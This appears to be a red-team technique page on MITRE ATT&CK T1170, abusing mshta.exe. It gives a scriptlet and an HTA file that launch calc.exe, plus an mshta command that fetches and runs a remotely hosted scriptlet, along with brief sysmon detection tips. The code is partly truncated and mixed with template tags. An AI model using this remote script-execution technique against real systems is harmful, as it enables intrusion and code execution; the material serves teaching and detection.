Skip to content

T1170: MSHTA


Writing a scriptlet file that will launch calc.exe when invoked:

{% code-tabs %} {% code-tabs-item title="" %}

<?XML version="1.0"?>
<registration description="Desc" progid="Progid" version="0" classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"></registration>

    <method name="Exec"></method>

<script language="JScript">
    function Exec() {
        var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
{% endcode-tabs-item %} {% endcode-tabs %}

Invoking the scriptlet file hosted remotely:

{% code-tabs %} {% code-tabs-item title="attacker@victim" %}

# from powershell
/cmd /c mshta.exe javascript:a=(GetObject("script:")).Exec();close();
{% endcode-tabs-item %} {% endcode-tabs %}


As expected, calc.exe is spawned by mshta.exe. Worth noting that mhsta and cmd exit almost immediately after invoking the calc.exe:

As a defender, look at sysmon logs for mshta establishing network connections:

Also, suspicious commandlines:


The hta file can be invoked like so:


or by navigating to the file itself, launching it and clicking run:

{% code-tabs %} {% code-tabs-item title="" %}

<script language="VBScript"> 
    Sub RunProgram
        Set objShell = CreateObject("Wscript.Shell")
        objShell.Run "calc.exe"
    End Sub
    Nothing to see here..
{% endcode-tabs-item %} {% endcode-tabs %}


{% embed url="" %}